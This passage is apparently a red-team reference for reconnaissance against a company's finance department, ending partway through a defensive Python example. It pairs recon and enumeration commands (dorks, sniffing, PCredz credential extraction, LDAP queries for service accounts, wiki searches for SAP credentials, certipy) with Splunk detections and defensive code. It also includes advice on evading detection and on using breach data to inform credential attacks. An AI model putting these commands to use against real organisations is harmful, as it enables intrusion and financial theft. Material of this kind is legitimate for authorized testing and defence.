Open-Source Intelligence — Corporate Finance Recon Reference
Position: External (unauthenticated) → On-network (no creds) → Authenticated
Goal: Systematically map a corporate finance department's attack surface from passive OSINT through internal enumeration to crown jewel identification
Visual Overview
graph TB
subgraph "Phase 1: Passive External OSINT (Zero Contact)"
A1[crt.sh / CT Logs]
A2[Shodan / Censys]
A3[Google Dorks]
A4[SEC/EDGAR Filings]
A5[LinkedIn Hierarchy]
A6[GitHub / Breach Data]
end
subgraph "Phase 2: Semi-Passive Recon (Light Contact)"
B1[Subdomain Enum]
B2[httpx Tech Fingerprinting]
B3[SSL/TLS SAN Extraction]
B4[Email Harvesting]
B5[ASN / IP Discovery]
end
subgraph "Phase 3: Finance System Fingerprinting"
C1[ERP URL Identification]
C2[Subdomain Naming Patterns]
C3[Payment Infrastructure OSINT]
C4[Regulatory Disclosure Mining]
end
subgraph "Phase 4: Internal Passive Recon (Post-Access)"
D1[tcpdump / Sniffing]
D2[TLS SNI Harvesting]
D3[Responder -A Mode]
D4[PCredz / Traffic Analysis]
D5[Subnet Purpose Mapping]
end
subgraph "Phase 5: Internal AD/LDAP Finance Enumeration"
E1[Anonymous LDAP Bind]
E2[Authenticated LDAP Query]
E3[GPO Analysis]
E4[Service Account Discovery]
end
subgraph "Phase 6: Internal OSINT Sources"
F1[Confluence / Wiki]
F2[JIRA / ServiceNow]
F3[SMB Share Spidering]
F4[AD CS Cert Harvesting]
end
subgraph "Phase 7: Finance Traffic Analysis"
G1[ERP Protocol Signatures]
G2[tshark Traffic ID]
end
subgraph "Phase 8: Lateral Movement to Crown Jewels"
H1[BloodHound Path Analysis]
H2[Admin Check / Pwn3d!]
H3[ERP Database Access]
H4[Secrets Dumping]
end
A1 & A2 & A3 & A4 & A5 & A6 --> B1 & B2 & B3 & B4 & B5
B1 & B2 & B3 & B4 & B5 --> C1 & C2 & C3 & C4
C1 & C2 & C3 & C4 --> D1 & D2 & D3 & D4 & D5
D1 & D2 & D3 & D4 & D5 --> E1 & E2 & E3 & E4
E1 & E2 & E3 & E4 --> F1 & F2 & F3 & F4
F1 & F2 & F3 & F4 --> G1 & G2
G1 & G2 --> H1 & H2 & H3 & H4
style A1 fill:#00ff00
style A2 fill:#00ff00
style A3 fill:#00ff00
style A4 fill:#00ff00
style A5 fill:#00ff00
style A6 fill:#00ff00
style B1 fill:#99ff00
style B2 fill:#99ff00
style B3 fill:#99ff00
style B4 fill:#99ff00
style B5 fill:#99ff00
style C1 fill:#99ff00
style C2 fill:#99ff00
style C3 fill:#99ff00
style C4 fill:#99ff00
style D1 fill:#ffaa00
style D2 fill:#ffaa00
style D3 fill:#ffaa00
style D4 fill:#ffaa00
style D5 fill:#ffaa00
style E1 fill:#ff0000
style E2 fill:#ff0000
style E3 fill:#ff0000
style E4 fill:#ff0000
style F1 fill:#ff0000
style F2 fill:#ff0000
style F3 fill:#ff0000
style F4 fill:#ff0000
style G1 fill:#ff0000
style G2 fill:#ff0000
style H1 fill:#ff0000
style H2 fill:#ff0000
style H3 fill:#ff0000
style H4 fill:#ff0000
1. Passive External OSINT (Zero Target Contact)
Passive reconnaissance is the most critical phase for targeting financial infrastructure. Because finance departments are heavily regulated and often rely on complex, third-party ecosystems, they leave a significant digital footprint that can be mapped without ever touching the target's network.
1.1 Certificate Transparency & Subdomain Discovery
Certificate Transparency (CT) logs provide a historical and real-time view of every SSL/TLS certificate issued for a domain. This is the most reliable way to find hidden finance portals, staging environments, and legacy ERP systems.
# crt.sh curl API to find subdomains
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u
# Censys query for certificates matching the target domain
# Search for certificates where the common name or SAN matches the target
services.tls.certificates.leaf_data.subject.common_name: "target.com"
# subfinder for comprehensive passive subdomain enumeration
# Queries multiple APIs (BinaryEdge, C99, CertSpotter, Chinaz, DNSDB, Fofa, etc.)
subfinder -d target.com -all -silent
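To make CT-log output actionable on the defensive side, the following Python, added here as an example and not part of the original reference, parses the crt.sh JSON shape the curl command above returns, splits multi-name entries, drops wildcards, and diffs the result against an asset inventory so that unlisted finance-looking hostnames (a staging payroll portal, a forgotten ERP host) surface for review. The sample records and the inventory are constructed; `classify_hosts`, `ct_review` and `FINANCE_LABELS` are names chosen for this example.

```python
import json
import re

# Constructed sample in the crt.sh JSON shape (not real certificate records).
# As in real responses, name_value can carry several names separated by newlines.
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "www.target.com\ntarget.com", "not_after": "2025-09-01T00:00:00"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "name_value": "*.target.com", "not_after": "2025-06-15T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "payroll-staging.target.com\nPayroll-Staging.target.com",
     "not_after": "2025-05-20T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "erp-old.target.com", "not_after": "2023-01-10T00:00:00"},
    {"issuer_name": "C=GB, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA",
     "name_value": "mail.othercorp.example", "not_after": "2025-08-01T00:00:00"},
])

# Constructed asset inventory: hostnames the organisation knows it serves.
KNOWN_HOSTS = {"target.com", "www.target.com"}

# First-label patterns that suggest a finance system (the naming patterns this
# reference lists under section 3.2); an assumed list for the example.
FINANCE_LABELS = re.compile(
    r"^(billing|invoice|erp|payroll|treasury|payments?|finance|accounting|ap|ar|"
    r"coupa|netsuite|workday|sap|oracle)([-.]|$)", re.IGNORECASE)


def parse_crtsh_names(json_text, domain):
    """Return the de-duplicated, lower-cased hostnames under `domain` found in a
    crt.sh JSON response. Multi-name entries are split, wildcard names are
    dropped (their concrete leaf names appear in other certificates), and any
    name outside `domain` is ignored."""
    names = set()
    for entry in json.loads(json_text):
        for raw in entry.get("name_value", "").splitlines():
            name = raw.strip().lower()
            if not name or name.startswith("*."):
                continue
            if name == domain or name.endswith("." + domain):
                names.add(name)
    return names


def classify_hosts(names, inventory):
    """Split CT-discovered hostnames into (known, unknown, finance_flagged):
    unknown = not in the inventory; finance_flagged = unknown names whose first
    label looks like a finance/ERP system and deserves the earliest review."""
    known = {n for n in names if n in inventory}
    unknown = names - known
    finance_flagged = {n for n in unknown if FINANCE_LABELS.match(n.split(".")[0])}
    return known, unknown, finance_flagged


def ct_review(json_text, domain, inventory):
    """Run the parse + classify steps and return a sorted report dict."""
    known, unknown, flagged = classify_hosts(parse_crtsh_names(json_text, domain), inventory)
    return {"known": sorted(known), "unknown": sorted(unknown), "finance_flagged": sorted(flagged)}


if __name__ == "__main__":
    for key, hosts in ct_review(SAMPLE_CRTSH_JSON, "target.com", KNOWN_HOSTS).items():
        print(f"{key}: {', '.join(hosts) or '-'}")
```

Feeding the real curl output into `ct_review` instead of the constructed sample turns the same recon query into a recurring inventory check; any name in `finance_flagged` that nobody owns is exactly the kind of host the rest of this reference goes looking for.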
1.2 Google Dorking for Finance Assets
Google dorks allow for precise identification of exposed financial documents, login portals, and configuration files.
Finance Portals & Login Pages:
site:target.com inurl:login "finance"
site:target.com inurl:erp "sap" | "oracle" | "netsuite" | "workday"
site:target.com intitle:"SAP NetWeaver Portal"
site:target.com intitle:"Oracle Applications Login"
site:target.com intitle:"NetSuite Login"
site:target.com intitle:"Workday Login"
Sensitive Documents:
site:target.com filetype:pdf "annual report" "confidential"
site:target.com filetype:xlsx "budget" | "payroll" | "accounts payable" | "accounts receivable"
site:target.com filetype:docx "wire transfer instructions" | "ACH instructions"
site:target.com filetype:pdf "SWIFT" | "BIC" | "IBAN"
Exposed Configuration & Logs:
site:target.com filetype:log "sap" | "oracle" | "erp"
site:target.com inurl:config "db_password" | "api_key"
site:target.com "index of" "finance" | "accounting"
1.3 Shodan & Censys for ERP Identification
Search for specific ERP signatures across the target's IP space to identify on-premise vs. cloud deployments.
Shodan Queries:
org:"Target Corp" "SAP NetWeaver"
org:"Target Corp" "Oracle EBS"
org:"Target Corp" "NetSuite"
org:"Target Corp" "Workday"
http.title:"SAP NetWeaver Portal"
http.title:"Oracle Applications"
http.component:"SAP NetWeaver"
http.component:"Oracle E-Business Suite"
1.4 LinkedIn & SEC/EDGAR Analysis
Understanding the human hierarchy and regulatory disclosures provides the "why" and "who" behind the technical infrastructure.
- LinkedIn Finance Hierarchy Mapping:
  - Identify the CFO, VP of Finance, and Controller.
  - Map the Accounts Payable (AP) and Accounts Receivable (AR) teams.
  - Look for "Treasury Analysts" and "ERP Systems Administrators".
  - Note the software mentioned in their profiles (e.g., "5 years experience with SAP S/4HANA").
- SEC/EDGAR (10-K Filings):
  - Search for "Item 1A. Risk Factors": Often mentions reliance on specific ERP vendors.
  - Search for "Item 7. Management's Discussion and Analysis": May discuss ongoing digital transformation or ERP migrations.
  - Search for "Material Contracts": Can reveal agreements with financial service providers.
- Job Posting Analysis:
  - Search for "SAP Basis Administrator", "Oracle EBS Developer", or "NetSuite Consultant" at the target company.
  - Requirements often list specific versions (e.g., "Experience with SAP ECC 6.0 EHP8").
  - Mentions of "integrating Workday with internal payroll systems" reveal architectural details.
1.5 GitHub Leaks & Breach Data
- GitHub Dorks:
  target.com "SWIFT"
  target.com "ACH"
  target.com "wire transfer"
  target.com "api_key payment"
  target.com "db_password finance"
- ExifTool Metadata Extraction:
  - Download public PDFs (Annual Reports, Invoices) and extract metadata.
  exiftool annual_report.pdf | grep -E 'Author|Creator|Producer|Company'
  - This often reveals internal usernames, software versions (e.g., "Microsoft Word 2016"), and internal file paths.
- Breach Data:
  - Use HaveIBeenPwned or DeHashed to find @target.com emails associated with finance roles.
  - Analyze password patterns from historical breaches to inform future credential-based attacks.
OPSEC Note: 🟢 ZERO risk. All queries are directed at third-party providers. The target sees no traffic.
2. Semi-Passive Recon (Light Target Contact)
This phase involves light interaction with the target's infrastructure to validate findings from Phase 1. While it touches the target, the traffic is designed to blend in with normal web browsing or DNS resolution.
2.1 Subdomain & Tech Fingerprinting
Pipeline findings from passive tools into active fingerprinting tools to confirm the presence of finance systems.
# subfinder + amass passive enum → httpx pipeline
# Confirms which subdomains are alive and identifies the technology stack
subfinder -d target.com -silent | httpx -title -status-code -tech-detect
# Finance-specific subdomain wordlist probe
# Probing for common finance-related subdomains that might not be in CT logs
# billing, invoice, erp, payroll, treasury, payments, finance, accounting, ap, ar, coupa, netsuite, workday, sap, oracle
ffuf -u https://FUZZ.target.com -w finance_subdomains.txt -mc 200,301,302,403
2.2 SSL/TLS SAN Extraction
Extract Subject Alternative Names (SAN) from certificates. This often reveals internal-only subdomains that are served on the same IP as a public portal.
# Direct TLS cert grab
# Connects to the target and extracts the certificate details
openssl s_client -connect target.com:443 -servername target.com </dev/null 2>/dev/null | openssl x509 -noout -text | grep -A1 "Subject Alternative Name"
2.3 Email Harvesting & ASN Discovery
# theHarvester for email harvesting from public sources
theHarvester -d target.com -b google,bing,linkedin,duckduckgo
# ASN/IP discovery via whois and Shodan
# Identify the target's IP ranges and ASN to narrow the scope of active scanning
whois -h whois.radb.net -- '-i origin AS12345' | grep -E 'route|descr'
🔵 Blue Team Detection — Web Fingerprinting
| Event ID | Source | Triggered by |
|---|---|---|
| N/A | WAF / Access Logs | Rapid sequence of HEAD/GET requests with unique User-Agents or tool signatures (e.g., "Go-http-client") |
Splunk — Detect web tech fingerprinting:
index=web_logs status=200
| stats count dc(url) as unique_urls by src_ip, user_agent
| where unique_urls > 50 AND count > 100
| sort -count
Note: Use residential proxies and custom User-Agents to evade this detection.
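The Splunk search above aggregates by source IP and User-Agent, and the note above points out that rotating User-Agents defeats that grouping. This Python, added here as an example and not from the original reference, runs the same logic (status 200 only, unique_urls > 50 AND count > 100 per src_ip + user_agent) over constructed access-log lines and adds the second grouping a defender wants: an IP-only aggregation that still fires when every request carries a different User-Agent. The log format, thresholds and the tool-signature list are assumptions for the example.

```python
import re
from collections import defaultdict

# Combined log format: ip ident user [time] "METHOD url proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# User-Agent substrings typical of HTTP tooling rather than browsers (assumed list).
TOOL_UA_MARKERS = ("go-http-client", "python-requests", "curl/", "httpx", "nuclei", "wfuzz")


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_fingerprinting(lines, min_unique_urls=50, min_requests=100):
    """Mirror the Splunk search (group by src_ip + user_agent) and additionally
    group by src_ip alone so a client rotating its User-Agent is still caught."""
    by_ip_ua = defaultdict(lambda: {"count": 0, "urls": set()})
    by_ip = defaultdict(lambda: {"count": 0, "urls": set(), "uas": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != "200":
            continue
        g = by_ip_ua[(rec["ip"], rec["ua"])]
        g["count"] += 1
        g["urls"].add(rec["url"])
        h = by_ip[rec["ip"]]
        h["count"] += 1
        h["urls"].add(rec["url"])
        h["uas"].add(rec["ua"])

    alerts = []
    for (ip, ua), g in by_ip_ua.items():
        if len(g["urls"]) > min_unique_urls and g["count"] > min_requests:
            is_tool = any(marker in ua.lower() for marker in TOOL_UA_MARKERS)
            alerts.append({"src_ip": ip, "user_agent": ua, "count": g["count"],
                           "unique_urls": len(g["urls"]),
                           "reason": "tool user-agent" if is_tool else "high-volume crawl"})
    already = {a["src_ip"] for a in alerts}
    for ip, h in by_ip.items():
        if ip in already:
            continue
        if len(h["urls"]) > min_unique_urls and h["count"] > min_requests:
            alerts.append({"src_ip": ip, "user_agent": "*", "count": h["count"],
                           "unique_urls": len(h["urls"]),
                           "reason": f"rotating user agents ({len(h['uas'])} distinct)"})
    return sorted(alerts, key=lambda a: -a["count"])


def _log_line(ip, method, url, status, ua):
    return f'{ip} - - [10/May/2025:10:00:00 +0000] "{method} {url} HTTP/1.1" {status} 512 "-" "{ua}"'


def build_sample_log():
    """Constructed log: one browser user, one obvious scanner, one UA-rotating scanner."""
    browser = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
    lines = [_log_line("192.0.2.5", "GET", f"/portal/page{i % 5}", 200, browser) for i in range(20)]
    lines += [_log_line("203.0.113.10", "GET", f"/probe/{i % 120}", 200, "Go-http-client/1.1")
              for i in range(150)]
    lines += [_log_line("198.51.100.7", "HEAD", f"/p/{i}", 200, f"Mozilla/5.0 (compatible; agent-{i})")
              for i in range(120)]
    return lines


if __name__ == "__main__":
    for a in detect_fingerprinting(build_sample_log()):
        print(a)
```

The IP-only pass only runs for addresses the first pass did not already flag, so each source produces a single alert; a source behind a rotating proxy pool would need the same aggregation keyed on a session or ASN field, which the constructed log does not carry.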
3. Finance System Fingerprinting
Identifying the specific ERP and financial software in use is critical for tailoring the internal phase of the operation. Different systems have different default paths, ports, and naming conventions.
3.1 ERP Fingerprint Table
| System | Version | Default Paths | Login Indicator | Notes |
|---|---|---|---|---|
| SAP NetWeaver | 7.x | /irj/portal, /sap/bc/gui/sap/its/webgui, /nwa | Title: "SAP NetWeaver Portal" | Verify in target env |
| Oracle EBS | R12 | /OA_HTML/AppsLocalLogin.jsp, /oa_html/AppsLogin | Title: "Oracle Applications" | On-prem deployments |
| NetSuite | Cloud | system.netsuite.com, forms.netsuite.com | SaaS — no on-prem paths | Always cloud-hosted |
| Workday | Cloud | *.workday.com, [company].workday.com, impl.workday.com | SaaS | Always cloud-hosted |
| Coupa | Cloud | [company].coupahost.com | SaaS | Always cloud-hosted |
| MS Dynamics | 365/On-prem | *.dynamics.com, /main.aspx | SaaS or on-prem | BC/F&O distinction |
| SAP S/4HANA Cloud | Cloud | *.s4hana.ondemand.com | SaaS | Modern cloud SAP |
| ADP | SaaS | *.adp.com, workforcenow.adp.com | Payroll SaaS | Always external |
3.2 Subdomain & Host Naming Patterns
Finance departments often follow strict naming conventions for their infrastructure to ensure auditability and organization.
- Subdomains:
  billing.target.com
  erp.target.com
  payroll.target.com
  treasury.target.com
  payments.target.com
  accounting.target.com
  ap.target.com (Accounts Payable)
  ar.target.com (Accounts Receivable)
- Internal Host Prefixes:
  FIN- (Finance)
  ACC- (Accounting)
  PAY- (Payroll)
  TRE- (Treasury)
  SAP- (SAP Servers)
  ORCL- (Oracle Servers)
- Internal Host Suffixes:
  -PROD (Production)
  -DEV (Development)
  -QA (Quality Assurance)
  -STAGE (Staging)
3.3 Payment Infrastructure OSINT
- SWIFT/BIC Codes: Search for the company's SWIFT code to identify their banking partners. This can be found on their public "Wire Transfer Instructions" or via SWIFT's online directory.
- Payment Gateways: Inspect the source code of public payment pages to identify gateways (e.g., Stripe, Adyen, Braintree, CyberSource).
- Regulatory Disclosure Mining: Mining SOC2 reports, PCI-DSS compliance statements, or GDPR disclosures (if leaked or publicly available) for network diagrams and data flow descriptions.
OPSEC Note: 🟢 ZERO risk. This is pure passive research and analysis of gathered data.
4. Internal Passive Recon (Post-Access, Pre-Enumeration)
Once on the network (e.g., via a rogue device, compromised workstation, or VPN access), the goal is to map the finance segment without sending a single packet that could trigger an IDS or NAC.
4.1 Passive Sniffing & Traffic Analysis
Use tcpdump and tshark to identify finance-related traffic by looking for specific ports and hostnames.
# Capture traffic for analysis (limit to 5000 packets to avoid large files)
sudo tcpdump -i eth0 -w internal_recon.pcap -c 5000
# tshark TLS SNI harvesting from live interface
# Identifies which internal servers are being accessed via HTTPS
# (Wireshark 3.0+ names these fields tls.*; releases before 3.0 use ssl.* instead)
sudo tshark -i eth0 -f "tcp port 443" -Y "tls.handshake.extensions_server_name" -T fields -e tls.handshake.extensions_server_name
# tshark TLS SNI harvesting from pcap file
tshark -r internal_recon.pcap -Y "tls.handshake.extensions_server_name" -T fields -e tls.handshake.extensions_server_name | sort -u
4.2 Responder & PCredz
# Responder in analyze-only mode (no poisoning)
# Listens for LLMNR, NBT-NS, and mDNS broadcasts to identify hostnames and domains
sudo responder -I eth0 -A
# PCredz to extract credentials and hashes from pcap
# Supports HTTP, FTP, SMTP, POP3, IMAP, Telnet, and NTLM
python3 Pcredz/Pcredz.py -f internal_recon.pcap
# Prebellico for network mapping from pcap
# python3 prebellico.py -f internal_recon.pcap -o /tmp/network_map
4.3 Subnet Purpose Mapping
Analyze the distribution of ports to identify the purpose of a subnet. Finance subnets often have a high density of database and ERP-specific ports.
| Port(s) | Service | Likely Subnet Purpose |
|---|---|---|
| 3200–3299 | SAP Dispatcher | SAP Application Tier |
| 3300–3399 | SAP Gateway | SAP Application Tier |
| 1521 | Oracle Listener | Database Tier (Oracle EBS) |
| 1433 | MS SQL Server | Database Tier (Dynamics/ADP) |
| 443 | HTTPS | SaaS ERP / Web Tier |
| 9000 | Oracle Forms | Legacy Oracle EBS |
| 3600 | SAP Message Server | SAP Internal Communication |
4.4 HTTP Host Header Extraction
# Extract HTTP Host headers to find internal web portals and ERP interfaces
tshark -r internal_recon.pcap -Y "http.request" -T fields -e http.host | sort -u
OPSEC Note: 🟢 ZERO risk for passive sniffing.
🔵 Blue Team Detection — Passive Sniffing Caveats
| Event ID | Source | Triggered by |
|---|---|---|
| N/A | Managed Switch | Detection of network interface in promiscuous mode (rare in corporate envs) |
| N/A | IDS / SIEM | Responder -A mode is silent, but if the tool is misconfigured to respond, it triggers LLMNR/NBT-NS poisoning alerts |
Splunk — Network Anomaly Detection:
index=network_logs
| stats count by src_mac, protocol
| eventstats avg(count) as avg_count stdev(count) as std_count by protocol
| where count > (avg_count + 3*std_count)
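The eventstats search above scores each source MAC against the mean and standard deviation of its protocol's population. The Python below, an added example rather than part of the original reference, implements that baseline over constructed per-host protocol counts and makes explicit the caveat the Splunk query leaves implicit: when the sample standard deviation is computed from the same snapshot that contains the outlier, no single host can ever exceed (n-1)/sqrt(n) standard deviations, so a 3-sigma rule is meaningless for a protocol seen from only a handful of hosts. The sigma multiplier, the minimum population and the sample data are assumptions.

```python
import math
import statistics
from collections import Counter


def build_sample_observations():
    """Constructed (src_mac, protocol) observations, not real traffic: 30 hosts
    emitting a few LLMNR queries each, one host emitting far more, and a small
    ARP population that is too small to score."""
    obs = []
    for i in range(30):
        mac = f"00:50:56:aa:00:{i:02x}"
        obs += [(mac, "llmnr")] * (4 + i % 3)          # 4, 5 or 6 queries each
    obs += [("00:50:56:aa:00:ff", "llmnr")] * 300       # the noisy host
    for i in range(4):
        obs += [(f"00:50:56:bb:00:{i:02x}", "arp")] * (10 + 5 * i)
    return obs


def protocol_outliers(observations, sigma=3.0, min_hosts=20):
    """Count packets per (src_mac, protocol); for each protocol seen from at least
    `min_hosts` hosts, flag hosts whose count exceeds mean + sigma * sample stdev
    (statistics.stdev is the sample standard deviation, as Splunk's stdev is).
    Returns a list of (src_mac, protocol, count, threshold) tuples."""
    counts = Counter(observations)
    per_proto = {}
    for (mac, proto), n in counts.items():
        per_proto.setdefault(proto, {})[mac] = n

    flagged = []
    for proto, hosts in per_proto.items():
        if len(hosts) < max(min_hosts, 2):
            continue  # too few hosts for the baseline to mean anything
        values = list(hosts.values())
        threshold = statistics.mean(values) + sigma * statistics.stdev(values)
        for mac, n in hosts.items():
            if n > threshold:
                flagged.append((mac, proto, n, round(threshold, 1)))
    return flagged


def max_reachable_z(n_hosts):
    """Largest z-score any one member of an n-point sample can have when the mean
    and sample standard deviation are computed from that same sample."""
    return (n_hosts - 1) / math.sqrt(n_hosts)


if __name__ == "__main__":
    for mac, proto, n, thr in protocol_outliers(build_sample_observations()):
        print(f"{mac} {proto}: {n} packets (threshold {thr})")
    print("max z with 11 hosts:", round(max_reachable_z(11), 2))
```

With eleven hosts the largest possible z-score is about 3.0, so a rule written as `count > avg + 3*std` can only fire on a population of a few dozen hosts or more; `min_hosts` guards against the silent false negative rather than producing a confident "nothing found".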
5. Internal AD/LDAP Finance Enumeration
Active enumeration of Active Directory to find finance-related users, groups, and service accounts. This is the first step in identifying lateral movement paths.
5.1 Anonymous LDAP Enumeration
If anonymous binds are allowed, you can map the entire finance department without any credentials.
# Search for finance-related groups
# Looks for groups containing "Finance", "Accounting", "Payroll", etc.
ldapsearch -x -H ldap://DC_IP -b 'dc=corp,dc=local' '(&(objectClass=group)(|(cn=*Finance*)(cn=*Accounting*)(cn=*Payroll*)(cn=*Treasury*)(cn=*AP*)(cn=*AR*)(cn=*ERP*)(cn=*SAP*)(cn=*Billing*)))' cn description
5.2 Authenticated LDAP Enumeration
Once you have a set of low-privileged credentials, you can perform more targeted queries.
# Enumerate users in the Finance OU
# Extracts usernames, emails, job titles, and departments
ldapsearch -x -H ldap://DC_IP -D 'user@corp.local' -w 'password' -b 'OU=Finance,DC=corp,DC=local' '(objectClass=user)' sAMAccountName mail title department
# Service account discovery filter
# Look for accounts associated with ERP systems and financial software
ldapsearch -x -H ldap://DC_IP -D 'user@corp.local' -w 'password' -b 'dc=corp,dc=local' '(|(cn=svc*sap*)(cn=svc*oracle*)(cn=svc*erp*)(cn=svc*finance*)(cn=svc*pay*))' cn sAMAccountName
5.3 PowerView Examples (Conceptual)
PowerView is the industry standard for AD enumeration.
# Get-DomainGroup -Identity "*Finance*"
# Get-DomainUser -SearchBase "OU=Finance,DC=corp,DC=local"
# Get-DomainGPO -ComputerIdentity "FIN-PROD-01"
5.4 GPO Analysis
Analyze Group Policy Objects (GPOs) applied to Finance OUs. Look for:
- Restricted Groups: Who has local admin rights on finance workstations?
- Scheduled Tasks: Are there tasks running as service accounts that could be hijacked?
- Registry Settings: Are security controls like LSA Protection or Credential Guard disabled?
🔵 Blue Team Detection — LDAP Enumeration
| Event ID | Source | Triggered by |
|---|---|---|
| 1644 | Directory Service (DC) | Expensive/large LDAP query (requires registry key to enable) |
| 4662 | Security (DC) | Reading AD objects (users, groups, GPOs) |
| 2889 | Directory Service (DC) | LDAP bind over unsigned/unencrypted channel |
Splunk — Detect bulk LDAP queries:
index=wineventlog sourcetype=WinEventLog:"Directory Service" EventCode=1644
| where SearchTimeInMs > 1000 OR EntriesReturned > 100
| stats count, avg(EntriesReturned) as avg_entries by ClientIP, Filter
| sort -avg_entries
| table ClientIP, Filter, count, avg_entries
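To show what the 1644 search above does to actual event content, this Python, added as an example and not from the original reference, applies the same expensive-or-large predicate and (ClientIP, Filter) grouping to constructed 1644 records whose field names follow the Splunk extraction used above, and adds a flag for filters that target finance or service-account naming, which is what separates the queries in section 5 from a directory sync job returning thousands of entries. Event 1644 is only written once the NTDS "15 Field Engineering" diagnostic level is raised (the registry prerequisite the table above mentions); the threshold values are the search's own, the finance term list is an assumption.

```python
import re
from collections import defaultdict

# Constructed Event ID 1644 records, already normalised to the field names the
# Splunk search uses. Not real log data.
SAMPLE_1644 = [
    {"ClientIP": "10.10.30.15", "Filter": "(&(objectClass=group)(|(cn=*Finance*)(cn=*Payroll*)))",
     "SearchTimeInMs": 1850, "EntriesReturned": 240},
    {"ClientIP": "10.10.30.15", "Filter": "(|(cn=svc*sap*)(cn=svc*erp*))",
     "SearchTimeInMs": 900, "EntriesReturned": 130},
    {"ClientIP": "10.10.30.15", "Filter": "(&(objectClass=group)(|(cn=*Finance*)(cn=*Payroll*)))",
     "SearchTimeInMs": 1700, "EntriesReturned": 240},
    {"ClientIP": "10.10.5.2", "Filter": "(sAMAccountName=jdoe)",
     "SearchTimeInMs": 3, "EntriesReturned": 1},
    {"ClientIP": "10.10.5.9", "Filter": "(objectClass=user)",
     "SearchTimeInMs": 4200, "EntriesReturned": 9500},
]

# Terms whose presence in a filter suggests finance/ERP-targeted enumeration
# (mirrors the group and service-account filters in section 5; assumed list).
FINANCE_TERMS = re.compile(
    r"finance|accounting|payroll|treasury|billing|erp|sap|oracle|svc\*", re.IGNORECASE)


def is_expensive(event, max_ms=1000, max_entries=100):
    """The search's predicate: SearchTimeInMs > 1000 OR EntriesReturned > 100."""
    return event["SearchTimeInMs"] > max_ms or event["EntriesReturned"] > max_entries


def summarize_expensive_ldap(events, max_ms=1000, max_entries=100):
    """Group expensive/large searches by (ClientIP, Filter) and return rows sorted
    by average entries returned, as the Splunk search does, plus a
    finance_targeted flag and the number of wildcard terms in the filter."""
    groups = defaultdict(list)
    for e in events:
        if is_expensive(e, max_ms, max_entries):
            groups[(e["ClientIP"], e["Filter"])].append(e["EntriesReturned"])
    rows = []
    for (ip, flt), entries in groups.items():
        rows.append({
            "ClientIP": ip,
            "Filter": flt,
            "count": len(entries),
            "avg_entries": sum(entries) / len(entries),
            "finance_targeted": bool(FINANCE_TERMS.search(flt)),
            "wildcards": flt.count("*"),
        })
    return sorted(rows, key=lambda r: -r["avg_entries"])


def finance_enumeration_sources(events):
    """Client IPs that issued more than one expensive finance-targeted search."""
    per_ip = defaultdict(int)
    for row in summarize_expensive_ldap(events):
        if row["finance_targeted"]:
            per_ip[row["ClientIP"]] += row["count"]
    return sorted(ip for ip, n in per_ip.items() if n > 1)


if __name__ == "__main__":
    for row in summarize_expensive_ldap(SAMPLE_1644):
        print(row)
    print("finance enumeration from:", finance_enumeration_sources(SAMPLE_1644))
```

Sorting by average entries, as the Splunk search does, puts the bulk `(objectClass=user)` sync at the top of the list; the `finance_targeted` and `wildcards` columns are what let an analyst skip it and land on the workstation issuing repeated `cn=*Finance*` and `cn=svc*` queries.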
6. Internal OSINT Sources (Wiki / Ticketing / Shares / Certs)
Internal documentation and collaboration tools are often poorly secured and contain sensitive finance information, including credentials and architectural diagrams.
6.1 Confluence & Wiki Search
Search for credentials, network diagrams, and process documents.
# Confluence REST API search for SAP credentials
# Searches for "SAP credentials" within the "FIN" space
curl -u 'user:pass' 'https://wiki.corp.local/rest/api/content/search?cql=text+~+"SAP+credentials"+AND+space.key="FIN"&limit=50'
6.2 JIRA & ServiceNow
Search for tickets related to finance systems. These often contain screenshots with sensitive info or temporary passwords.
- "ERP migration"
- "Finance server maintenance"
- "Access request for SAP"
- "Payroll system error"
- "SWIFT gateway configuration"
6.3 SMB Share Listing & Spidering
# List shares on a suspected finance server
netexec smb 10.10.10.50 -u 'user' -p 'pass' --shares
# Spider a share for sensitive keywords
# Greps for Finance, Accounting, Budget, Payroll, and ERP
# netexec smb 10.10.10.50 -u 'user' -p 'pass' -M spider_plus -o 'DOWNLOAD=False' 'KEYWORDS=Finance,Accounting,Budget,Payroll,ERP'
6.4 AD CS Certificate Harvesting
Use certipy to find vulnerable certificate templates. Compromising a certificate template can allow for domain-wide escalation or impersonation of any finance user.
certipy find -u 'user' -p 'pass' -d corp.local -dc-ip DC_IP -vulnerable
6.5 Email Distribution Group Enumeration
# PowerShell to list members of the Finance distribution group
# Reveals the full list of employees in the finance department
# Get-DistributionGroupMember -Identity "Finance-All"
🔵 Blue Team Detection — File Share Access
| Event ID | Source | Triggered by |
|---|---|---|
| 5140 | Security | A network share object was accessed |
| 5145 | Security | A network share object was checked to see whether client can be granted desired access |
| 4656 | Security | A handle to an object was requested (files/folders) |
Splunk — Detect SMB spidering:
index=wineventlog EventCode=5145
| stats dc(RelativeTargetName) as unique_files by src_ip, ShareName
| where unique_files > 100
| table src_ip, ShareName, unique_files
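The 5145 search above counts distinct files per source and share over the whole search window, so its verdict depends on how wide that window is. The Python below, an added example and not from the original reference, evaluates the same distinct-file count inside a sliding time window over constructed 5145 records, so a burst of file opens in forty seconds is separated from an analyst who opens a file every few minutes across a morning. The window size, threshold and field names (src_ip, ShareName, RelativeTargetName, time) are assumptions modelled on the search.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def build_sample_5145():
    """Constructed 5145 (detailed file share) records, not real log data:
    one host opening 150 distinct files on the Finance share in under a minute,
    and one user opening a file every five minutes for an hour."""
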